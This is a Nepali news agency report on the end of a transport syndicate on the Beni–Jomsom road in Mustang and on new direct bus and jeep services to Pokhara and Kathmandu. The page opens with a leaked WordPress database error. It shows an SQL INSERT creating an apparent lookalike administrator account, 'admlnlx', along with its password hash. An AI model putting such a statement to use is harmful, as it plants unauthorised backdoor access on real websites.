WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B60XWy1A9mUwfJeis4o6ke7z83YhDo0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 12:25:00', '', 'admlnlx', 'admlnlx')
मुस्ताङ, माघ ९–
मुस्ताङलाई राष्ट्रिय राजमार्गसँग जोड्ने एकमात्र सडकमार्ग बेनी–जोमसोम सडकखण्डमा स्थानीय यातायात व्यवसायीले लगाउदै आएको सिन्डिकेट क्रमशः हट्दै गएको छ ।
सिन्डिकेट हटेपछि यात्रुलाई आवतजावतमा सहज भएको छ । ‘ट्र्याक’ खुलेदेखि नै म्याग्दी र मुस्ताङ जिप तथा बस सञ्चालक समिति मातहतका सवारी साधनमात्रै सञ्चालन हुने ७६ किलोमिटर बेनी–जोमसोम सडकमा अहिले बेनी, पोखरा र काठमाडौँबाट जोमसोमसम्म सिधा यात्रुबाहक बस तथा जिप सञ्चालनमा आएका छन् । एक वर्षदेखि म्याग्दी र मुस्ताङ समितिले हरेक दिन बेनीदेखि जोमसोमसम्म सिधा यात्रुबाहक बस सञ्चालन गरिरहेको छ ।
गत मङ्सिरदेखि मुक्तिनाथ दर्शन प्रालिले जोमसोम–पोखरामा सिधा जिप सेवा सञ्चालन गरिरहेको छ । यो रुटमा हरेक दिन तीनवटासम्म जिप छुट्ने गरेका छन् ।
धौलागिरि अञ्चल यातायात बस व्यवसायी सञ्चालक समितिले गत बिहीबारदेखि जोमसोम–काठमाडौँ सिधा रात्रि डिलक्स बस सेवा सञ्चालनमा ल्याएको छ । यो सेवा म्याग्दी सदरमुकाम बेनीसम्म रहेकामा स्थानीय यातायात व्यवसायीको सहकार्यमै जोमसोमसम्म विस्तार गरिएको हो । समितिका सदस्य यमबहादुर पुनले मुस्ताङ भ्रमणमा आउने पर्यटकलाई लक्षित गरी काठमाडौँबाट हरेक दिन दुईवटा रात्रि बस सेवा सुरु गरिएको बताउनुभयो ।
पोखरा र काठमाडौँबाट समेत सेवा सञ्चालन भएपछि पर्यटकीय जिल्लामा आउने पर्यटक र स्थानीयवासीलाई सहज भएको जोमसोमका कुलबहादुर थकालीले बताउनुभयो । “पहिला पोखरासम्म पुग्न कि त महँगो भाडा तिरेर हवाईमार्ग प्रयोग गर्नुपथ्यो, तैपनि त्यो भरपर्दो थिएन”, उहाँले भन्नुभयो – “अहिले बस र जिपमा रोजेर यात्रा गर्न पाइएको छ ।” म्याग्दी र मुस्ताङ समितिले स्थानीय यात्रुलाई लक्षित गर्दै बेनी–घासा र घासा–जोमसोममा नियमित बस तथा जिप सञ्चालन गरिरहेको छ । –रासस